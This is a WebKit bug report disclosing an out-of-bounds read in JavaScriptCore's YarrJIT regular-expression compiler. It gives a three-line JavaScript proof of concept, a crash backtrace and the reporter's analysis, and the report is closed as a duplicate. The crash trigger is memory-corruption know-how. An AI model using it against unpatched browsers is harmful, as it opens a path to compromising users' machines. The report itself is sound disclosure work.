Bug 276046
| Summary: | readCharacter in JavaScriptCore YarrJIT reads wrong patternCharacter which is an OOB | ||
|---|---|---|---|
| Product: | WebKit | Reporter: | EntryHi <entryhii> |
| Component: | JavaScriptCore | Assignee: | Michael Saboff <msaboff> |
| Status: | RESOLVED DUPLICATE | ||
| Severity: | Normal | CC: | bfulgham, msaboff, webkit-bug-importer |
| Priority: | P2 | Keywords: | InRadar |
| Version: | WebKit Nightly Build | ||
| Hardware: | PC | ||
| OS: | Linux | ||
EntryHi
Hello, I found a bug in JavaScriptCore related to YarrJIT.
==============poc.js==================
const v11 = /(?<a>.)\k<a>o/vi;
const v22 = "\u{12345}bcde";
v22.split(v11);
======================================
Version: Latest JSC
JavaScriptCore commit: 7f839364528de8cde2678aa52490c1ec36268d83
Run args:
./jsc poc.js
JavaScriptCore crashed in JITTed code with SIGSEGV 11.
After analysis, I found that this bug may be related to JavaScriptCore/yarr/YarrJIT.cpp `matchBackreference` function.
In matchBackreference function, JSC invoke `readCharacter` to generate JIT code which reads patternCharater.
When execute JITTed code, it should get "0xd808" which is UTF-16 Encoding of \u{12345}, but it incorrectly get 2 bytes before "0xd808", which is an OOB.
Crash Stack:
* thread #1, name = 'jsc', stop reason = signal SIGSEGV: invalid address (fault address: 0x0)
frame #0: 0x00007fffa6c74151
-> 0x7fffa6c74151: movzwl (%r11,%r9,2), %r9d
0x7fffa6c74156: cmpl %r9d, %eax
0x7fffa6c74159: jne 0x7fffa6c741eb
0x7fffa6c7415f: jmp 0x7fffa6c74177
(lldb) bt
* thread #1, name = 'jsc', stop reason = signal SIGSEGV: invalid address (fault address: 0x0)
* frame #0: 0x00007fffa6c74151
frame #1: 0x00007ffff475aee0 libJavaScriptCore.so.1`JSC::Yarr::YarrCodeBlock::execute(this=0x00007fffe7040b00, input=span<const char16_t, 18446744073709551615UL> @ 0x00007fffffffb930, start=0, output=0x00007fffe7022340, matchingContext=0x00007fffffffba80) at YarrJIT.h:352:28
frame #2: 0x00007ffff58cc685 libJavaScriptCore.so.1`int JSC::RegExp::matchInline<WTF::Vector<int, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>, (JSC::Yarr::MatchFrom)0>(this=0x00007fffe70576c8, nullOrGlobalObject=0x00007fffa541a088, vm=0x00007fffa5000000, s=0x00007fffa5462298, startOffset=0, ovector=0x00007fffa541a8f8) at RegExpInlines.h:144:43
frame #3: 0x00007ffff58cc3b0 libJavaScriptCore.so.1`JSC::RegExp::match(this=0x00007fffe70576c8, globalObject=0x00007fffa541a088, s=0x00007fffa5462298, startOffset=0, ovector=0x00007fffa541a8f8) at RegExp.cpp:281:12
frame #4: 0x00007ffff58ebcc6 libJavaScriptCore.so.1`JSC::RegExpGlobalData::performMatch(this=0x00007fffa541a8a8, owner=0x00007fffa541a088, regExp=0x00007fffe70576c8, string=0x00007fffa5462290, input=0x00007fffa5462298, startOffset=0, ovector=0x00007fffffffbd78) at RegExpGlobalDataInlines.h:56:28
frame #5: 0x00007ffff58e838e libJavaScriptCore.so.1`void JSC::genericSplit<JSC::regExpProtoFuncSplitFast(JSC::JSGlobalObject*, JSC::CallFrame*)::$_2, JSC::regExpProtoFuncSplitFast(JSC::JSGlobalObject*, JSC::CallFrame*)::$_3>(globalObject=0x00007fffa541a088, regexp=0x00007fffe70576c8, inputString=0x00007fffa5462290, input=0x00007fffa5462298, inputSize=6, position=0x00007fffffffc0d0, matchPosition=0x00007fffffffc074, regExpIsSticky=false, regExpIsUnicode=true, control=0x00007fffffffc050, push=0x00007fffffffc018)::$_2 const&, JSC::regExpProtoFuncSplitFast(JSC::JSGlobalObject*, JSC::CallFrame*)::$_3 const&) at RegExpPrototype.cpp:432:63
frame #6: 0x00007ffff58e793b libJavaScriptCore.so.1`JSC::regExpProtoFuncSplitFast(globalObject=0x00007fffa541a088, callFrame=0x00007fffffffc1d0) at RegExpPrototype.cpp:573:5
frame #7: 0x00007fffa6c54038
frame #8: 0x00007ffff60f0389 libJavaScriptCore.so.1`llint_op_call + 213
frame #9: 0x00007ffff60cb805 libJavaScriptCore.so.1`llint_call_javascript + 6
frame #10: 0x00007ffff503050b libJavaScriptCore.so.1`JSC::Interpreter::executeProgram(this=0x00007fffa5015a10, source=0x00007fffffffce50, (null)=0x00007fffa541a088, thisObj=0x00007fffe701e008) at Interpreter.cpp:1143:28
frame #11: 0x00007ffff546c823 libJavaScriptCore.so.1`JSC::evaluate(globalObject=0x00007fffa541a088, source=0x00007fffffffce50, thisValue=JSValue @ 0x00007fffffffcd50, returnedException=0x00007fffffffce70) at Completion.cpp:137:37
frame #12: 0x00000000004b3226 jsc`runWithOptions(globalObject=0x00007fffa541a088, options=0x000000000051eca0, success=0x00007fffffffd2a3) at jsc.cpp:3774:35
frame #13: 0x00000000004553ec jsc`jscmain(this=0x00007fffffffd370, vm=0x00007fffa5000000, globalObject=0x00007fffa541a088, success=0x00007fffffffd2a3)::$_11::operator()(JSC::VM&, GlobalObject*, bool&) const at jsc.cpp:4463:13
frame #14: 0x00000000004195dd jsc`int runJSC<jscmain(int, char**)::$_11>(options=0x000000000051eca0, isWorker=false, func=0x00007fffffffd370)::$_11 const&) at jsc.cpp:4245:13
frame #15: 0x0000000000416c7c jsc`jscmain(argc=2, argv=0x00007fffffffd4d8) at jsc.cpp:4456:18
frame #16: 0x00000000004169dc jsc`main(argc=2, argv=0x00007fffffffd4d8) at jsc.cpp:3532:15
frame #17: 0x00007ffff147b1e2 libc.so.6`__libc_start_main + 242
frame #18: 0x00000000004108be jsc`_start + 46
Credit:
Jiming Wang
| Attachments | ||
|---|---|---|
| Add attachment proposed patch, testcase, etc. |
Radar WebKit Bug Importer
<rdar://problem/130839510>
Michael Saboff
*** This bug has been marked as a duplicate of bug 275528 ***